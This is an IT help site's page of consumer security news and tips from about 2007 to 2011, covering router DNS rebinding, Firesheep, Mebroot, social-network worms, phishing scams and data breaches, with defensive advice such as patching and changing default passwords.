 Discussions at the 2010 DEFCON security conference revealed that commonly used residential routers, such as the Linksys WRT54G, are subject to an attack known as “DNS rebinding,” which uses a script to get around security measures taken in the router firmware.  Because most large Internet sites, such as Google, have multiple IP addresses (for load balancing and the like), your computer stores these extra IPs and considers them acceptable.  When you visit a site in which malicious software is embedded, it loads a script onto your computer which runs on one of these “pre-stored” sites, then establishes an Internet connection to your computer, allowing the hacker to possibly control your router and, therefore, everything on your computer.  It is not browser specific, and only applies to some routers.  What can you do about this?  First of all, most routers are set up using an Internet address (192.168.1.1), with a network name and password.  Do NOT keep the default password (Admin, Password, or the like).  Change it.  See Password for more info about a secure password.  Same for the default SSID (network name), e.g. Linksys.  Change it.  Also, regularly keep your router firmware updated.  Of course, don’t trust unknown web content, even ads on trusted websites.   If you are a more advanced user (careful here, you can seriously screw up your computer), you could disable HTTP and enable HTTPS in your router settings, maybe disable UpNP (but not if you have services such as Skype), use the NoScript browser plug in for Firefox (suspends Java, Flash and Active-X, asking first for its use), maybe even switch to OpenDNS, which changes DNS from your ISPs defaults to those of OpenDNS (208.67.220.220 and 208.67.222.222).  If you need help, call!

In December, 2010 Adobe released version 10 of Adobe Reader.  It’s more secure, as it has the addition of “Protected Mode” which provides enhanced malware protection based on sandboxing technology.  While it’s not foolproof, it’s quite effective.  However, be aware that you must completely remove previous versions of Adobe (use Add & Remove Programs in Control Panel) before installing version 10.  Word is, Adobe Flash will also be getting this feature as well.

 Cell phone security tips:  Don’t jailbreak your iPhone - because that breaks all of the security.  If you have “locate and wipe” enable it.  That way, if you lose and can’t find your phone, at least you can erase your data.  Most important - set a passcode.  At least it’ll slow down a thief.  Don’t just use the default - that’s how the News Corp. hackers got into cell phones, assuming users were lzay.  And some were.

Beware Firesheep.  This recently released Firefox add-on is an app that lets Wi-Fi snoops grab session cookies broadcast over open networks in order to get access to victims’ accounts, known as “sidejacking.”  This basically occurs because many sites (including some e-mailsites such as Hotmail and FaceBook) use a secure connection for the logon, but then go back to an unsecure connection afterwards. Now, zscaler.com has posted on its site a countermeasure named “Blacksheep” (for both Windows and Mac) which “cloaks” your connection to foil Firesheep snoopers. Also, you can use a VPN, or HTTPS (as Twitter has suggested by enabled, starting March, 2011).

Lately, many viruses have found their way into computers through unpatched versions of Flash and also Java.  There aren’t many applications that demand Java any more (Open Office is one exception), so if you don’t need it, you can unstall it.

We all expected that, as cellphones and VoIP became more common, malware and viruses would eventually arise on these devices.  And they are.  For example, for users of Skype, there can be worries about the W32/Pykse.worm, which uses Skype for spreading.  Also, the PWS-Pkyse Trojan, which attempts to steal Skype user names and passwords (this one masquerades as a “Skype-Defender” plug-in for Skype).  Cellphones have been infected by the commwarrior virus around the world, also the RavMonE.exe virus. Cellphones have been infected by the commwarrior virus around the world, also the RavMonE.exe virus.  In late 2009, Kaspersky Lab reported a new malicious program that steals money by taking over Nokia phones and making small charges to the owners’ wireless accounts.  Also in late 2009, an Australian student created an experimental worm that infected iPhones adapted to run unauthorized Apple software; it didn’t cause any damage, just installed a photo of 80’s pop star Rick Astley. Also, recognizing that this threat is increasing, various companies are starting to offer protection - Lookout (a startup), Symantec, Research In Motion, among others, are starting to get out the message. It can only get worse, so be vigilant!  See this LINK to learn how to disinfect your cell phone if you get a virus.  If in doubt, or you’re afraid you’ll ruin your computer or phone, call a pro!

Not too long ago, we were pretty safe advising clients just to not open their e-mail if they didn’t recognize the sender.  That was because historically, at that time, malware came into the computer via e-mail on Port 25 (which has been changed by some ISPs such as Comcast and Verizon to Port 587 for just this reason).  Now, 85% of malware infections come through web traffic, according to Webroot software.  So make especially sure that you have excellent malware filters.  Still, NEVER open unexpected file attachments, whether Office, PDFs or otherwise.  Microsoft does offer patches for different versions of Word and Excel, downloadable from its website; your anti-virus should do the rest.

Researchers at Verisign have reported that, since February 2007, more than 15,000 victims have fallen prey to spear-phishing attacks.  They believe that two crime groups are responsible for 95% of the attacks, but does not expect the attacks to let up.  Two of the most successful attacks involved e-mails that claimed to be from the IRS or the Better Business Bureau or e-mails that appeared to be subpoenas for court charges.  [See, Spyware page.]

McAfee, the security technology company, reports that the chance of downloading unwanted software while surfing the Web has increased 41.5% compared to last year.  According to McAfee, Hong Kong websites top the list, with more than 19% of all web sites that end with the .hk domain posing a security risk such as adware, spyware, viruses, spam, excessive pop-ups or browser exploits.  Second most dangerous was The People’s Republic of China (.cn domain), followed by Philippines (.ph), Romania (.ro) and Russia (.ru).  On the other hand, the safest countries are Finland (.fi), Japan (.jp) and Norway (.no).

Security research company Trend Micro recently reported that of the top 100 infections in the U.S. in 2008, approximately 63% were caused by downloading and running programs, e-mail borne infections only accounted for 3%. and the exploitation of security flaws in products was responsible for only 1.7% of PC infections.  Contrary to popular belief, then, criminals, visits to malicious websites and e-mail are not the major cause of infections.  The most common software - free games, utilities, toolbars, pornography and pirated software.

March, 2010: In a security advisory, Microsoft advised Windws XP user not to press the F1 key when prompted by a web site, because due to a logic flaw attackers could craft an attack through an unpatched vulnerability that could exploit PCs running Internet Explorer.  The dialogue box prompting users to press the F1 Help key, which can appear repeatedly when dismissed, should be ignored.  A patch should be available within the next couple of weeks and will be automatically downloaded through Windows Updates.

Looking for a secure flash drive for your files or bootable USB drive when you are on the road?  So-called “hardened” flash drives which use military grade encryption, self-destruct features, password memory and other neat features are available if you want to pay more for your drive.  An example is IronKey, at about $99 for a 2GB drive, $149 for 4Gb.  Other drives are manufactured by Kingston, Corsair, Imation and Lexar.

Adobe has released Flash 10.1, which is said to conserve battery power, make video run more smoothly on mobile devices, and will also support touchscreen gestures such as pinching or widening the screens, along with patching possible spyware/virus holes.  When it arrives, download it, or CLICK HERE for the link.

September, 2010:  E-mails with the subject line “Here you have...” can transmit viruses which can infect Windows computers.  Most anti-virus programs should detect this by now, but still be aware of their existence.

The Verizon’s “2010 Verizon Data Breach Report,” prepared in cooperation with the U.S. Secret Service, has been released and it contained both good news and bad news:  Good news: There’s been a decline in the number of compromised electronic records, from 295 million in 2008 to 143 million in 2009.  The bad news:  48% of data breaches were due to employee misuse of access to company information, not outside hackers.  The moral:  Restrict user access to company information and monitor frequently for violations.

Intel, worlds largest chipmaker, has announced on August 19, 2010 that it will acquire McAfee Internet Security for $7.68 billion, making Intel a major player in the security software and services market.  Analysts expect that many of the tools that McAfee provides today may be built in to Intel chips and devices over time, which may change the nature of the security industry.  Intel has already built a variety of security functions directly into its chips and provided customers ways to tap into the tools.

January, 2010: A malicious software program known as the “Kneber botnet” has infected the computers of more than 2,500 corporations around the world.  It’s purpose appears to be to compromise both commercial and government systems, including 68,000 corporate log-in credentials.  It has also gained access to e-mail systems, on line banking accounts, Facebook, Yahoo, Hotmail and other social network credentials and more than 2,000 digital security certificates as well as a significant cache of personal identity information.  The botnet makes sophisticated use of a Trojan Horse backdoor entryway known as ZeuS, which was primarily as Trojan for stealing banking information.  A similar earlier botnet known as Waldec also compromised many corporate systems.

If you’re a business traveler using wireless networks when you are on the road, you should be aware of the “Hole 196” vulnerability in 802.11 networks using even the more secure WPA2 security.  Basically, it is a man-in-the-middle attack that can only be carried out by an authorized network user.  Airtight Networks has developed a security patch.

The Stuxnet virus of 2010 affected primarily Siemens machines, which are used by manufacturers.  Note that many manufacturing machines were built years before password security or even Internet connectivity, so they are particularly at security risk now for hacking.  It is increasingly believed that the worm virus was an attack by Israeli intelligence against Iran and other countries which were developing enriched uranium, necessary for nuclear bombs.  The worm causes quick rotational changes in centrifuge and other motors, causing them to burn out.

April, 2010:  For the past two years, Adobe Reader has led the pack in exploit vulnerabilities.  In 2008, Adobe Reader attacks comprised 28.61% of targeted attacks; in 2009, that number jumped to 49.5%; so far in 2010, it is 61.2%!  By contrast, Microsoft’s key products have dropped significantly - Word is at 24.3%, Excel 7.1% and Powerpoint 7.4%.  This is according to security company F-Secure.  McAfee figures are similar, finding PDF exploits responsible for 49% of web-based attacks, Acrobat Reader from 2% in 2007 to 28% so far this year, mostly on unpatched machines.   It is key to your protection that you install Adobe Reader and similar updates when prompted - the most recent one patched a major vulnerability.  Starting on April 13th, Adobe will be experimenting with automatic patch installs, no prompting to install the updates.  Same for Flash, Java and Acrobat.  BEWARE: Those who push malware have also found a way to pose themselves as patchers for Adobe and Java updaters - make sure you’re installing a real Adobe update - it usually doesn’t include attachments like spreadsheets.  Don’t be too smug if you’re running the Apple or Linux operating systems - these exploits will compromise these systems as well.  Be sure to patch and upgrade Adobe Reader, Acrobat, Flash and JavaScript promptly.  [Go to the Apple Support Downloads page.]

Those of you who opened the link to the “sexiest video ever” on FaceBook in May, 2010 received an uppleasant surprise, as it was an attack, which installs by requiring you to update your software which installs the Hotbar adware to generate revenue for spammers.  Similar for that June FaceBook message claiming “This horrific photo forced photographer to kill himself”.  And for the June, 2010 link to the “101 Hottest Women in the World” clickjack scheme.  See a pattern here?  Shame on you, by now you should know better!

Don’t open that gift certificate from Apple iTunes unless you’re sure that it’s from Apple.  Spammers are sending out e-mails claiming these awards, but they contain a dangerous ZIP file which infects Windows computers.  As always, check the source (Apple iTunes) before clicking on an unknown link or attachment.

2009

11/1/09:  Microsoft has issued a patch protecting users of Win2K, XP and Server 2003 from an exploit allowing remote code execution or launching of a denial-of-service attach from your computer.  The code is cleverly hidden in a specific type of Embedded Open-Type Font.  Yes, a font.  Good news is that the MS patch (MS09-065 (969947)) removes the threat.

1/1/09:  Another Facebook trojan (see Koobface, below):  Whitewell uses Facebook (in particular, the Notes section of Facebook’s mobile version) as a delivery method.  This trojan relies on the actual Facebook account to spread, rather than the server for Facebook itself, therefore it is different than many botnets.

3/23/09:  Beware of Twitter Phishing attacks.  If you get Tweets saying “lol is that you in here? +link to video” it may connect to a malicious virus.  The folks at Twitter write:  “A bit o’phishing going on - - if you get a wierd direct message, don’t click on it and certainly don’t give your login creds!” Beware of what you click on, don’t give away any information and beware of any shortened URLs (check where they lead using longurl).

2/24/09: Gmail users who are logged into Google Chat have been getting messages that appear to be from friends, urging them to click on a Web address starting with tinyurl.com that takes them to a site called ViddyHo, which asks for the person’s Gmail log-in and then hijacks the account, sending out chat messages to the user’s contacts and spreading itself further.  This phishing attack lures surfers to click on videos for hot topics and timely news events that can download malware onto their computers.

You can expect many more worms and other types of viruses on social networking sites like the new variant of the Koobface worm that targeted Facebook late last year.  It appears that virus code writers have decided that it’s time to infect these sites, which are often used by businesses now, in addition to individuals. THIS PREDICTION CAME TRUE IN OCTOBER, 2010:  a NEW VERSION WHICH CAN AFFECT BOTH WINDOWS AND MAC MACHINES THROUGH JAVA HAS MADE ITS APPEARANCE.

Sinowal (more recently a/k/a/ Mebroot) is back.  This is a “drive-by” download, credited (Washington Post) with stealing more than 500,000 bank account passwords, credit card information and other sensitive financial information.  This is a super Trojan that uses a technique known as HTML injection that puts very convincing information on your browser prompting you to enter confidential passwords or account numbers, then keylogs them and transmits them to theives.  Because the infection resides on the master boot record of your hard drive (which it rewrites) in rootkit fashion, has no executible files to detect, no svchost.exe or rundll32.exe files to appear as processes, and has its own encrypted 128-bit external data transmission, it is virtually undetectable by anti-virus or anti-spyware software.  And, because it bypasses Windows’ normal communication routines, it works outside any firewall you might have.  While some rootkit detectors find may some versions of Mebroot, since it changes almost monthly, they really don’t have a chance of keeping up with the variants.  Good news for Vista users - since Vista’s boot method is different from XP, and its User Account Control regime (if you didn’t already turn it off as a nuisance) gets in the worm’s way, Mebroot is mostly directed at Windows XP users. Some say that the infection gets in through Adobe Reader, Flash or Quicktime, even if they are fully patched.  So what to do?  Microsoft hasn’t done and doesn’t plan to do anything about MBR infections, and banks don’t seem to care either, so don’t depend on either to protect you from Mebroot.  Unfortunately, the best you can do is to religiously run your anti-virus, anti-spyware and anti-rootkit programs and be vigilant with your web surfing, particularly regarding financial institutions.  Sorry.

Anti-spyware vendor Webroot published a report on 9/29/08 that charted a rapid increase in the volume of infected files being distributed, in particular via peer-to-peer file-sharing networks, that have been disguised as campaign-oriented content.  Webroot specifically warned users to beware of malware files being propagated in files labeled as McCain and Obama campaign videos.  Webroot has seen large amounts of such infected files being traded on Gnutella, which is accessed by many users of FrostWire and LimeWire.  Webroot said a targeted search of the FrostWire network found some 34 search results for “Obama speech,” 14 of which contained some form of active malware, while 5 of the 19 results found for “McCain speech” were found to be carrying malware.  The most common malware variant was found to be W32/Zipware, a well-established Trojan downloader, containing a .zip file with executable files that, when run, infect the host machine with random malware, including rogue anti-virus applications, which in turn pretend to detect security issues on infected machines in an attempt to lure users to buy rogue AV applications for disinfection.  Webroot says that, in some cases, the files also include password stealers and backdoor infections as well.

Note about Trojan.NewMediaCodec: This virus wreaks havoc on computers taking advantage of a vulnerability in Windows Media Player. When users are "told" they need an upgrade to Windows Media Player in order to view movies on certain (adult) websites, the subsequent download installs a Trojan. Therefore, instead of getting some "enhancement," what really happens is that Trojan.NewMediaCodec downloads and installs additional malware on your machine. You very much want to remove this if it shows up on your computer.  See similar discussions about these “must have” uploads and players in the Hoaxes page of this site as well.

You can expect many more worms and other types of viruses on social networking sites like the new variant of the Koobface worm that targeted Facebook late last year.  It appears that virus code writers have decided that it’s time to infect these sites, which are often used by businesses now, in addition to individuals. THIS PREDICTION CAME TRUE IN OCTOBER, 2010:  a NEW VERSION WHICH CAN AFFECT BOTH WINDOWS AND MAC MACHINES THROUGH JAVA HAS MADE ITS APPEARANCE.

2/24/09: Gmail users who are logged into Google Chat have been getting messages that appear to be from friends, urging them to click on a Web address starting with tinyurl.com that takes them to a site called ViddyHo, which asks for the person’s Gmail log-in and then hijacks the account, sending out chat messages to the user’s contacts and spreading itself further.  This phishing attack lures surfers to click on videos for hot topics and timely news events that can download malware onto their computers.

3/23/09: Beware of Twitter Phishing attacks.  If you get Tweets saying “lol is that you in here? +link to video” it may connect to a malicious virus.  The folks at Twitter write:  “A bit o’phishing going on - - if you get a wierd direct message, don’t click on it and certainly don’t give your login creds!” Beware of what you click on, don’t give away any information and beware of any shortened URLs (check where they lead using longurl).

Don’t click on links or respond to Tweets that you aren’t familiar with.  Duh! This is how many viruses and spyware propagate.  You may not even see the damage on your own computer, because it may be used to send out messages allegedly from you to others that contain viruses or spyware. True examples: You may receive Tweets from one of your friends, but it appears to offer a $500 Victoria’s Secret gift card (if you’ll just click), or to watch your friend in an awesome new video in which they star (if you’ll just click) or make more money or increase your IQ (if you’ll just click), or answer the question “Are You in This Picture” (click to see it).  This means that the sender’s account has probably been seized by malware, unknowing victims of the infection.  They probably clicked on one of these messages, continuing the chain of infection.  For more considerations about  Social Networking, click HERE.

6/11/09:  Don’t assume that you can stop updating your Adobe Flash product  (See entry below).  The Gumblar trojan is still very much around.  Gumblar typically inserts iFrames into legitimate sites that direct browsers to the malware-laden site gumblar.cn.  Use LinkScanner or the like for protection.

Samy Kamkar, the hacker who brought MySpace to its knees in 2005 is now out from criminal probation.  And he has crafted new software that targets your home network router.  While the original Samy worm merely tagged your MySpace profile with the phrase “but most of all, Samy is my hero”, this new infection attacks routers which have not reset their password from the defaults (admin/password), enabling Samy to pinpoint your router’s physical address through Mac ID, and then conceivably either take control of your connection or load a malware payload.

We knew it would happen someday, and it finally has.  Pedophiles and others have found a way to exploit virus-infected PCs to remotely store and view their stash of child pornography without fear of getting caught.  You might not even know your computer was involved until the police knock at your door.  A number of people have been surprised this way, and have spent thousands to clear their name.  Don’t be one of them - regularly scan your computer for viruses!

  TJ Maxx announced an intrusion in January 2007 in which, over time, 45 million customer records had been exposed.  DSW Shoes, OfficeMax and Hannaford Bros. all announced breaches in their computer systems as well.  This in addition to the unknown hackers who stole more than 360,000 customer records from Citibank.

CLICK HERE TO GO BACK TO THE SECURITY PAGE